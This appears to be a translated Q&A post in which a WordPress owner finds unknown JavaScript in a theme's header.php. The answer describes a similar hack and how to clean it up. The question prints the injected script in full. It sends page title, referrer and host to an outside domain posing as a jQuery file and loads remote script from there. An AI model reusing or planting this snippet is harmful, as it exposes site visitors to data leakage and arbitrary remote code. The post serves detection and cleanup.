在WordPress的網站的header.php文件中找到未知代碼

Question

我發現下面的代碼到主題的header.php文件中，我不確定它們是什麼。

<script> 
    var a = ''; 
    setTimeout(10); 
    var default_keyword = encodeURIComponent(document.title); 
    var se_referrer = encodeURIComponent(document.referrer); 
    var host = encodeURIComponent(window.location.host); 
    var base = "http://tradenetservice.com/js/jquery.min.php"; 
    var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; 
    var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); 
    if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') { 
     document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>'); 
    } 
</script> 

Answer 1

我剛剛在一個星期前被類似的注射了一個黑客攻擊的WordPress站點。在我的header.php中添加了代碼，只有當網站是從手機瀏覽時，纔將用戶重定向到外部網站（廣告，色情片）。

活動主題中的其他文件也被注入。

我所做的是下載所有站點文件，並將它們與備份進行比較。通過這種方式，我在主題中找到了注入代碼，還發現了/ wp-includes /中的一些文件，這些文件不屬於普通的wordpress安裝的一部分，也就是各種各樣的後門。

另外檢查網站根目錄下的wp-load.php，在我的情況下，我從/ wp-includes /中刪除的文件被包含/執行，形成一個額外的行在這個文件中。

除了清理網站的代碼，您應該做一些關於保護您的WordPress網站免受黑客攻擊的搜索，並會發現許多建議的措施，以防止它再次發生。